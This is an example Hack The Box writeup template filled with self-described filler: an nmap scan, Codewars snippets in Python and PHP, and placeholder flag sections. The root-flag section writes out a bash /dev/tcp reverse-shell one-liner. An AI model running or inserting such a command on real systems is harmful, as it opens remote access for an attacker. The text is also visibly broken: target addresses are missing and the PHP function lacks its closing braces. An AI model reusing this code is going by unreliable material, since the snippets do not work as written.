Hack The Box - Example Writeup

Everything below is just random stuff for the sake of example.

Information Gathering


We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.

x@wartop:~$ nmap -sVC

Starting Nmap 7.01 ( https://nmap.org ) at 2019-08-11 08:57 PDT
Nmap scan report for (
Host is up (0.022s latency).
Not shown: 996 closed ports
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
53/tcp  open  domain
81/tcp  open  http     Apache httpd
|_http-server-header: Apache
444/tcp open  ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=
| Not valid before: 2018-07-06T14:40:08
|_Not valid after:  4756-06-01T14:40:08

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.22 seconds

From the above output we can see that ports, 22, 53, 81, and 444 are the ports open. This is just an example to show code formatting so who cares.

Look here’s an image of my website, this is how you format an image.

My Website Figure 1: My Website

Github Figure 2: Github Profile

Maybe we want to show some python code too, to let’s take a look at a snipped from codewars to format time as human readable.

def make_readable(seconds):        

    hours = seconds / 60**2
    minutes = seconds/60 - hours*60
    seconds = seconds - hours*(60**2) - minutes*60

    return '%02d:%02d:%02d' % (hours, minutes, seconds)


In order to gain our initial foothold we need to blablablabla. Here’s another code snippet just for fun.

function sqInRect($lng, $wdth) {

    if($lng == $wdth) {
      return null;

    $squares = array();

    while($lng*$wdth >= 1) {
      if($lng>$wdth) {
        $base = $wdth;
        $lng = $lng - $base;
      else {
        $base = $lng;
        $wdth = $wdth - $base;
      array_push($squares, $base);
    return $squares;

Above is the php code for the Rectangle into Squares kata solution from codewars.

User Flag

In order to get the user flag, we simply need to use cat, because this is a template and not a real writeup!

x@wartop:~$ cat user.txt

Root Flag

The privilege escalation for this box was not hard, because this is an example and I’ve got sudo password. Here’s some code to call a reverse shell bash -i >& /dev/tcp/ 0>&1.

Root Figure 3: root.txt v5gw5zkh8rr3vmye7p4ka


In the conclusion sections I like to write a little bit about how the box seemed to me overall, where I struggled, and what I learned.


  1. https://github.com/Wandmalfarbe/pandoc-latex-template
  2. https://github.com/d0n601/HTB_Writeup-Template/